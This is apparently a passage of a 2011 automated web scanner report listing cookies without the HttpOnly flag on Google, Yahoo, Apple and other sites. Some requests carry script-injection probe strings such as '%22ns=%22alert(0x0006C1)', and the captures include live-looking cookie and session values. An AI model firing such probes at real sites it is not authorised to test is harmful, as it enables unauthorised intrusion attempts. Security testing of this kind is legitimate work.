Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxNLaxrASUcFEk%253D; myPAL=eJylkj1PwzAQhv9LvHq4O387U2iEVIlEUALqytiZkfLfubPrtEVVB5iSOM89Pr%252Fnj4w2fx0y9J%252BZQu7Q%252BqRSSqgQrAIPauGXiVeo6w8ZBfOCBXfCAigAZCxAo2iVrdQtmWHMFll0iqIzIWkDFLiIrCvW4WHR2%252Fld76a93jxNehj3UmnXDWK4s4E7Y%252FECixVbGuYZw3iJEYCy0Sv5G25KEKrkrUmiYFXSAgyGz0DqlcBy30dA4RJzvuhSycbqRAEcagICJx8GfX1wDKbGMA589vFlXvS4nR%252B1pMJplIHI4Lz%252Fk09ULdxTsIj%252F0w3Ps6i4w13RyU2w%252BEt3z1CqysUw5yq8rqq9XI%252B8679%252FANW9nC8%253D; BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; TFF=eJydlUtywyAMhu%252BSE%252BgBFsIbH6NbL7zoTHftLpO7FzsJJGBcuQsGhvk%252FvSzkObLG63dEihcEN8EAk6rSZZwjxetnxDEtpz5tsB0HHW%252BNHlc9V3pKq%252BYkYzYi7eA6SmltLx%252FL1%252Fyz9GzTsJeGwASAe2lLCSYdW32dtjwdYcVJxmxE2gWMtteYyPleDqHkEO56V%252FQUPItWMYXWU0uiKgv9h2QgEW8lJYM2It05b43q2cRht%252BlDKPqwo28iCq2f8Nr0oW76LrF9U4DJheHYE7WuHpwRSZcAVuvPAiCcK9hDf7ZgCTtTMBROfUK7kWnR646%252BiUxbP3l%252B3TEbsT5kNtreHgkfPK88x1wmtYwAziPAmbkXj0oCvjvHuSa5kAQE9Xvug%252B8uGetGtQbL2PVZk5JBG5Hu2J%252BIKv8ID%252FPBv8huPg3JhTws%252Fjt4%252BwVfmf5g

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDSxNjaxrASUUFEU%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqNsuu2YJ%252FDszdpO2qCoSrPI699i5433BUD4OBdbvhbis0Mdscs5oELyBCGaSm0He0Gp9KKhYVIzDEWMwACgYw0zRIluoazInmK%252ByFAyl4DhbB8QSIh%252Bqtbub7GZ8s9thZ%252B8fB9v1O036ZYHENxYIJyydYalh04xFwTCdYwRgfIpGv%252FJVCUKTvM6SpFiTzAWyk38g80LgZd%252BfgMpl4WLV5dqNt5kYAloCgqAPDmO7SA2u1dB38u%252F98zjZfjM%252BWG1F2qgD0cHF%252BCefquZyj8Ui%252Fk%252FXPY2qkh1uq05PgscfuluGmqoHw51SeJlqe7kcec3psXDpt5wONyDJcL%252B%252BAQnrpp0%253D; expires=Mon, 04-Apr-2011 20:52:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlU1ywyAMhe%252BSE%252BgHIoQ3Pka3XmTRme7aXSZ3L3YSSMC4ogsPHuZ96AlL8hKdi9fviBRPCG6GM8yqSqdpiRSvnxGn9Dj1aYHt9azTrdHjqudKT%252BmpOcmYjUgruI5S2rMvH5ev5efSO5tqZEtDYAbAvbSlmEmvrb5OW56BsOIkYzYirQLGs1dP5Hwvh1ByCHe9K3oKnkUrT6GN1JKoykL%252FIRlIxFtJyaCNSHvOW109izjsFn0IRR929I2j0MYJr0Uf6qLvEts3BZhdOB9HojbUgzMiaROg0y7InQtAGLuwh370whI2cmEonOqEdp1p0euOvnGmbZw8v%252B6YjVgbmY1nb03CB%252B2VP4zLpJYRwHkEODP3ElFJwHfnONckF5KAoO7nPvgekrEuVKtZxm7MmpQM2oi0x37AVf4RHuaDf5HdfBqSC3l4%252BQ34GCsed6v%252B0GrmhpN8I4eSfJJDSUrmbMTtF8bmQ6U%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com
Date: Thu, 03 Feb 2011 20:52:27 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');

13.182. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d87f8fbaa3c80bca:TM=1296765175:LM=1296765175:S=3Tp1xR4u0iL6wLlf; expires=Sat, 02-Feb-2013 20:32:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

13.183. http://maps.google.com/maps/stk/lc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/stk/lc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/stk/lc?client=ca-pub-3033999741136561&lc_format=map_inset_ad&ll=41.946689%2C-87.722974&spn=0.009576%2C0.017166&z=15&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1296787023%2Cchannel%3A5653360264%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A0%2Curl%3Ahttp%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1296787023670%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1296787013038%2Cfrm%3A0%2Cadk%3A3364239293%2Cga_vid%3A1487308896.1296787013%2Cga_sid%3A1296787013%2Cga_hid%3A720933573%2Cga_fc%3A1%2Cu_tz%3A-360%2Cu_his%3A0%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A0%2Cu_nmime%3A0%2Cbiw%3A1172%2Cbih%3A684%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: maps.google.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:36:09 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=69b3a9f8936fd3cd:TM=1296786969:LM=1296786969:S=Znhp57geg0ZK3Dar; expires=Sun, 03-Feb-2013 02:36:09 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: maps-stickers
X-XSS-Protection: 1; mode=block
Content-Length: 11992

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:hand;}body,table,div,ul,li{font-size
...[SNIP]...

13.184. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/vp?spn=0.009576,0.017166&z=15&key=ABQIAAAAqUG6cBk-lc5l1KbeaOXOjhTubhXEVwpghVXLU4K27b8P7oUIhBSMYxh0xBzPJNNUP_E0Nghrmd9Stw&sensor=false&mapclient=jsapi&vp=41.946689,-87.722974 HTTP/1.1
Accept: */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: maps.google.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:36:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=268113a99f223409:TM=1296786968:LM=1296786968:S=oY4yQ6jBh-I_jke5; expires=Sun, 03-Feb-2013 02:36:08 GMT; path=/; domain=.google.com
Set-Cookie: NID=43=AckVHOw3YOdzE60VWTK2kRGV4E-sJackoDnchSo5Wwu9u-LpkYmB9Ler_dwEIKIX6M8UXy6AtUFrDu9sCjo_ITjFSsr_-yIrnoY9_j6-EaMrZeCRQlPPPFyLcZIEGTXS; expires=Sat, 06-Aug-2011 02:36:08 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 917

GAddCopyright("m","12408144506920699521",41.9419,-87.7316,41.9515,-87.7144,15,"Google",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:41951320,w:-87758789,n:41967659,e:-87692871
...[SNIP]...

13.185. http://mobile.jackpotcity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.jackpotcity.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?vp=jpc403475513 HTTP/1.1
Host: mobile.jackpotcity.com
Proxy-Connection: keep-alive
Referer: http://www.jackpotcity.com/online-casino/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=26101158.471062058.1296765008.1296765008.1296765008.1; __utmb=26101158; __utmc=26101158; __utmz=26101158.1296765008.1.1.utmccn=(referral)|utmcsr=thumbshots.com|utmcct=/Support.aspx|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1gj5cr2idrfdnk55bux11f55; path=/; HttpOnly
Set-Cookie: CCH=JPM; expires=Sun, 31-Jan-2021 20:30:00 GMT; path=/
Set-Cookie: FCVR=1412626935; expires=Sun, 31-Jan-2021 20:30:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:59 GMT
Vary: Accept-Encoding
Content-Length: 53100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

13.186. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-abhYEve3ZZl2E&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EDIAJKANq0itiBCpnizJGquYH6TbIAHAAQH7BYGWAJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ
If-None-Match: "J18332:E0-293462370-1296766279068"

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EBUAJKANq0itiBCpnizJGquYH6TbIAHAAQH8BYG2AJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ; expires=Thu, 05-May-2011 02:23:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "J18338:E0-293462370-1296766279068"
Cache-Control: private, no-transform, max-age=600
Expires: Fri, 04 Feb 2011 02:33:00 GMT
Content-Length: 159
Date: Fri, 04 Feb 2011 02:23:00 GMT
Server: QS

qc_results({"segments":[{"id":"D"},{"id":"T"},{"id":"2872"},{"id":"2871"},{"id":"1794"},{"id":"1104"},{"id":"1102"},{"id":"769"},{"id":"768"},{"id":"759"}]});

13.187. http://qa.linkedin.com/pub/smart-devil/19/697/322/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qa.linkedin.com
Path:   /pub/smart-devil/19/697/322/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/smart-devil/19/697/322/x22 HTTP/1.1
Host: qa.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/
Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT
If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:33:42 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

13.188. http://qooxdoo.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qooxdoo.org
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: qooxdoo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:05 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch11
Set-Cookie: DokuWiki=0fe5e502b58fb55e4cd7f270e6fe8676; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DW79e26b637e697ad5a16041d830721ef8=deleted; expires=Wed, 03-Feb-2010 19:50:04 GMT; path=/
Set-Cookie: bb2_screener_=1296762605+173.193.214.243; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head profile="http://dublincore.org/documen
...[SNIP]...

13.189. http://scholar.google.com/schhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=b21d411537c17de4; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=b21d411537c17de4:TM=1296765145:LM=1296765145:S=lnZ4BvSGU2dAv7Fs; expires=Sat, 02-Feb-2013 20:32:25 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:32:25 GMT
Server: scholar
Expires: Thu, 03 Feb 2011 20:32:25 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><title>Google Scholar</title><style>body,td,a,p,.h{font-family:arial,sans-ser
...[SNIP]...

13.190. http://scholar.google.com/scholar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /scholar

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://scholar.google.com/schhp?hl=en&as_sdt=0,9
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=9dd644ba4e502c12; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=9dd644ba4e502c12:TM=1296765148:LM=1296765148:S=HhpqPeTQ6Mm1STTz; expires=Sat, 02-Feb-2013 20:32:28 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:32:28 GMT
Server: scholar
Content-Length: 249
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://scholar.google.com/schhp?
...[SNIP]...

13.191. http://shopping.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search;_ylc=X3oDMTE4aHZtZGtyBF9TAzc4NDcxODMyNQRrA2FiYyBkZXZlbG9wbWVudARzZWMDdGl0bGU-?p=abc+development&sem=google/x22 HTTP/1.1
Host: shopping.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:33:45 GMT
Set-Cookie: B=eso7aa56km499&b=3&s=7m; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: SHOPSEMAFFILIATE=sem=google/x22; expires=Thu, 03-Feb-2011 21:03:45 GMT; path=/; domain=.shopping.yahoo.com
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 105590

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/reset
...[SNIP]...

13.192. http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 301 Apple
Date: Thu, 03 Feb 2011 18:10:25 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
set-cookie: wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: woinst=920064012; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
last-modified: Thu, 03 Feb 2011 10:10:25 GMT
cache-control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
location: http://store.apple.com/us/browse/home
expires: Tue, 02 Feb 2010 10:10:25 GMT
pragma: no-cache
vary: *
connection: close
content-length: 0
Content-Type: text/html; charset=ISO-8859-1
x-frame-options: sameorigin


13.193. http://store.apple.com/us-hed/findyourschool  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us-hed/findyourschool

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us-hed/findyourschool HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; 